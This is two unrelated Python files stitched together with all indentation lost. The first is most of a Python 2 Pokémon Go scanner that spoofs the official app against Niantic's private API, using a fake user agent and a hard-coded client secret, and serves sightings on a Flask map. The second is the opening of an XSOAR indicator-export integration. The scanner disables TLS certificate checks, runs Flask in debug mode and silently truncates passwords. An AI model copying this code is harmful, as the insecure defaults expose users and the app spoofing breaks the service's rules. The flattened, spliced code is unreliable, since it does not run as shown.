def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return None  # fullmap is not defined in this helper, so fail the login like the other error paths do
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
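# Editor's note (illustrative, not part of the original script): the loop above walks an
# outward square spiral around the start location. x and y begin at 0, the direction
# (dx, dy) is rotated 90 degrees whenever one of the corner conditions is hit, and each
# visited cell is offset by 0.0025 degrees per unit of x/y from origin_lat/origin_lon.
# The first few (x, y) offsets produced by that update rule are:
#   (0, 0) -> (1, 0) -> (1, 1) -> (0, 1) -> (-1, 1) -> (-1, 0) -> (-1, -1) -> (0, -1) -> ...
# so steplimit**2 iterations cover roughly a steplimit-by-steplimit block of cells
# centred on the start location.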
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching pokemons for location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = set([])
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId + ':' \
+ str(wild.pokemon.PokemonId)
if hash not in seen:
visible.append(wild)
seen.add(hash)
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokename = pokemonsJSON[str(poke.pokemon.PokemonId)]
if args.ignore:
if pokename.lower() in ignore:
continue
elif args.only:
if pokename.lower() not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
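# Editor's note (illustrative): process_step() widens coverage by taking the level-15 S2
# cell that contains the current position and sending one extra heartbeat from the centre
# of each of its child cells, then de-duplicating sightings with the
# "SpawnPointId:PokemonId" hash before they are processed into the pokemons dict.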
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
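# Editor's note (illustrative): the scan loop is self-rescheduling. The first call
# (initial_registration=True) runs the search in a plain daemon Thread; every later call
# queues threading.Timer(30, main), so each full spiral ends with main() calling
# register_background_thread() again and the next scan starts about 30 seconds after the
# previous one finishes. A minimal standalone sketch of that hand-off, with hypothetical
# names that are not used anywhere else in this file:
#
#   def rescan_forever(scan_once, delay=30):
#       scan_once()
#       timer = threading.Timer(delay, rescan_forever, args=(scan_once, delay))
#       timer.daemon = True
#       timer.start()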
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(0, 0, 256, .4)"
if gym[0] == 2:
color = "rgba(255, 0, 0, .4)"
if gym[0] == 3:
color = "rgba(255, 255, 0, .4)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
ExportIndicators.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import re
import json
import traceback
from base64 import b64decode
from multiprocessing import Process
from gevent.pywsgi import WSGIServer
from tempfile import NamedTemporaryFile
from flask import Flask, Response, request
from netaddr import IPAddress, IPSet
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
from typing import Callable, List, Any, cast, Dict, Tuple
class Handler:
@staticmethod
def write(msg: str):
demisto.info(msg)
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'Export Indicators Service'
PAGE_SIZE: int = 200
DEMISTO_LOGGER: Handler = Handler()
APP: Flask = Flask('demisto-export_iocs')
CTX_VALUES_KEY: str = 'dmst_export_iocs_values'
CTX_MIMETYPE_KEY: str = 'dmst_export_iocs_mimetype'
FORMAT_CSV: str = 'csv'
FORMAT_TEXT: str = 'text'
FORMAT_JSON_SEQ: str = 'json-seq'
FORMAT_JSON: str = 'json'
FORMAT_ARG_MWG = 'mwg'
FORMAT_ARG_PANOSURL = 'panosurl'
FORMAT_ARG_BLUECOAT = 'bluecoat'
FORMAT_ARG_PROXYSG = 'proxysg'
FORMAT_MWG: str = 'McAfee Web Gateway'
FORMAT_PROXYSG: str = "Symantec ProxySG"
FORMAT_PANOSURL: str = "PAN-OS URL"
FORMAT_XSOAR_JSON: str = 'XSOAR json'
FORMAT_ARG_XSOAR_JSON: str = 'xsoar-json'
FORMAT_XSOAR_JSON_SEQ: str = 'XSOAR json-seq'
FORAMT_ARG_XSOAR_JSON_SEQ: str = 'xsoar-seq'
FORMAT_XSOAR_CSV: str = 'XSOAR csv'
FORMAT_ARG_XSOAR_CSV: str = 'xsoar-csv'
MWG_TYPE_OPTIONS = ["string", "applcontrol", "dimension", "category", "ip", "mediatype", "number", "regex"]
CTX_FORMAT_ERR_MSG: str = 'Please provide a valid format from: text, json, json-seq, csv, mwg, panosurl and proxysg'
CTX_LIMIT_ERR_MSG: str = 'Please provide a valid integer for List Size'
CTX_OFFSET_ERR_MSG: str = 'Please provide a valid integer for Starting Index'
CTX_MWG_TYPE_ERR_MSG: str = 'The McAfee Web Gateway type can only be one of the following: string,' \
' applcontrol, dimension, category, ip, mediatype, number, regex'
CTX_COLLAPSE_ERR_MSG: str = "The Collapse parameter can only be one of the following: 0 - Don't Collapse, " \
'1 - Collapse to Ranges, 2 - Collapse to CIDRS'
CTX_MISSING_REFRESH_ERR_MSG: str = 'Refresh Rate must be "number date_range_unit", examples: (2 hours, 4 minutes, ' \
'6 months, 1 day, etc.)'
CTX_NO_URLS_IN_PROXYSG_FORMAT = 'ProxySG format only outputs URLs - no URLs found in the current query'
MIMETYPE_JSON_SEQ: str = 'application/json-seq'
MIMETYPE_JSON: str = 'application/json'
MIMETYPE_CSV: str = 'text/csv'
MIMETYPE_TEXT: str = 'text/plain'
DONT_COLLAPSE = "Don't Collapse"
COLLAPSE_TO_CIDR = "To CIDRs"
COLLAPSE_TO_RANGES = "To Ranges"
SORT_ASCENDING = 'asc'
SORT_DESCENDING = 'desc'
_PROTOCOL_REMOVAL = re.compile(r'^(?:[a-z]+:)*//')
_PORT_REMOVAL = re.compile(r'^([a-z0-9\-\.]+)(?:\:[0-9]+)*')
_INVALID_TOKEN_REMOVAL = re.compile(r'(?:[^\./+=\?&]+\*[^\./+=\?&]*)|(?:[^\./+=\?&]*\*[^\./+=\?&]+)')
_BROAD_PATTERN = re.compile(r'^(?:\*\.)+[a-zA-Z]+(?::[0-9]+)?$')
'''Request Arguments Class'''
class RequestArguments:
def __init__(self, query: str, out_format: str = FORMAT_TEXT, limit: int = 10000, offset: int = 0,
mwg_type: str = 'string', strip_port: bool = False, drop_invalids: bool = False,
category_default: str = 'bc_category', category_attribute: str = '',
collapse_ips: str = DONT_COLLAPSE, csv_text: bool = False, sort_field: str = '',
sort_order: str = ''):
self.query = query
self.out_format = out_format
self.limit = limit
self.offset = offset
self.mwg_type = mwg_type
self.strip_port = strip_port
self.drop_invalids = drop_invalids
self.category_default = category_default
self.category_attribute = [] # type:List
self.collapse_ips = collapse_ips
self.csv_text = csv_text
self.sort_field = sort_field
self.sort_order = sort_order
if category_attribute is not None:
category_attribute_list = category_attribute.split(',')
if len(category_attribute_list) != 1 or '' not in category_attribute_list:
self.category_attribute = category_attribute_list
def is_request_change(self, last_update_data: Dict):
if self.limit != last_update_data.get('last_limit'):
return True
elif self.offset != last_update_data.get('last_offset'):
return True
elif self.out_format != last_update_data.get('last_format'):
return True
elif self.mwg_type != last_update_data.get('mwg_type'):
return True
elif self.drop_invalids != last_update_data.get('drop_invalids'):
return True
elif self.strip_port != last_update_data.get('strip_port'):
return True
elif self.category_default != last_update_data.get('category_default'):
return True
elif self.category_attribute != last_update_data.get('category_attribute'):
return True
elif self.collapse_ips != last_update_data.get('collapse_ips'):
return True
elif self.csv_text != last_update_data.get('csv_text'):
return True
elif self.sort_field != last_update_data.get('sort_field'):
return True
elif self.sort_order != last_update_data.get('sort_order'):
return True
return False
''' HELPER FUNCTIONS '''
def list_to_str(inp_list: list, delimiter: str = ',', map_func: Callable = str) -> str:
"""
Transforms a list into a string, with a custom delimiter between the list items
"""
str_res = ""
if inp_list:
if isinstance(inp_list, list):
str_res = delimiter.join(map(map_func, inp_list))
else:
raise AttributeError('Invalid inp_list provided to list_to_str')
return str_res
def get_params_port(params: dict) -> int:
"""
Gets port from the integration parameters
"""
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def sort_iocs(request_args: RequestArguments, iocs: list) -> list:
"""
Sorts the IoCs according to the sort field and order.
Returns: Sorted List of IoCs, if sorting arguments are defined.
"""
try:
if request_args.sort_field:
if request_args.sort_order == SORT_ASCENDING:
return sorted(iocs, key=lambda ioc: ioc[request_args.sort_field], reverse=False)
elif request_args.sort_order == SORT_DESCENDING:
return sorted(iocs, key=lambda ioc: ioc[request_args.sort_field], reverse=True)
except KeyError:
demisto.debug('ExportIndicators - Could not sort IoCs, please verify that you entered the correct field name.\n'
f'Field used: {request_args.sort_field}')
except Exception as e:
demisto.debug(f'ExportIndicators - Could not sort IoCs due to an unknown error.\n{e}')
return iocs
def refresh_outbound_context(request_args: RequestArguments) -> str:
"""
Refresh the cache values and format using an indicator_query to call demisto.searchIndicators
Returns: List(IoCs in output format)
"""
now = datetime.now()
# poll indicators into list from demisto
iocs = find_indicators_with_limit(request_args.query, request_args.limit, request_args.offset)
iocs = sort_iocs(request_args, iocs)
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
# in CSV formats the header line should not be counted as an indicator
if request_args.out_format in [FORMAT_CSV, FORMAT_XSOAR_CSV]:
actual_indicator_amount = actual_indicator_amount - 1
# re-poll in case formatting or IP collapsing reduced the number of results below the limit
while actual_indicator_amount < request_args.limit:
# from where to start the new poll and how many results should be fetched
new_offset = len(iocs) + request_args.offset + actual_indicator_amount - 1
new_limit = request_args.limit - actual_indicator_amount
# poll additional indicators into list from demisto
new_iocs = find_indicators_with_limit(request_args.query, new_limit, new_offset)
# in case no additional indicators exist - exit
if len(new_iocs) == 0:
break
# add the new results to the existing results
iocs += new_iocs
iocs = sort_iocs(request_args, iocs)
# reformat the output
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
if request_args.out_format == FORMAT_CSV:
actual_indicator_amount = actual_indicator_amount - 1
if request_args.out_format == FORMAT_JSON:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_JSON
elif request_args.out_format in [FORMAT_CSV, FORMAT_XSOAR_CSV]:
if request_args.csv_text:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_TEXT
else:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_CSV
elif request_args.out_format in [FORMAT_JSON_SEQ, FORMAT_XSOAR_JSON_SEQ]:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_JSON_SEQ
else:
out_dict[CTX_MIMETYPE_KEY] = MIMETYPE_TEXT
set_integration_context({
"last_output": out_dict,
'last_run': date_to_timestamp(now),
'last_limit': request_args.limit,
'last_offset': request_args.offset,
'last_format': request_args.out_format,
'last_query': request_args.query,
'current_iocs': iocs,
'mwg_type': request_args.mwg_type,
'drop_invalids': request_args.drop_invalids,
'strip_port': request_args.strip_port,
'category_default': request_args.category_default,
'category_attribute': request_args.category_attribute,
'collapse_ips': request_args.collapse_ips,
'csv_text': request_args.csv_text,
'sort_field': request_args.sort_field,
'sort_order': request_args.sort_order,
})
return out_dict[CTX_VALUES_KEY]
def find_indicators_with_limit(indicator_query: str, limit: int, offset: int) -> list:
"""
Finds indicators using demisto.searchIndicators
"""
# calculate the starting page (each page holds 200 entries)
if offset:
next_page = int(offset / PAGE_SIZE)
# set the offset from the starting page
offset_in_page = offset - (PAGE_SIZE * next_page)
else:
next_page = 0
offset_in_page = 0
iocs, _ = find_indicators_with_limit_loop(indicator_query, limit, next_page=next_page)
# if the in-page offset is bigger than the number of results returned, return an empty list
if len(iocs) <= offset_in_page:
return []
return iocs[offset_in_page:limit + offset_in_page]
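# Editor's note (worked example, not in the original): with PAGE_SIZE = 200, an offset of
# 450 gives next_page = int(450 / 200) = 2 and offset_in_page = 450 - 400 = 50, so the
# search starts at page 2, the first 50 entries of that page are skipped, and the slice
# returns at most `limit` indicators starting from the 451st match of the query.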
def find_indicators_with_limit_loop(indicator_query: str, limit: int, total_fetched: int = 0, next_page: int = 0,
last_found_len: int = PAGE_SIZE):
"""
Finds indicators in a while loop using demisto.searchIndicators, and returns the results and the last page searched
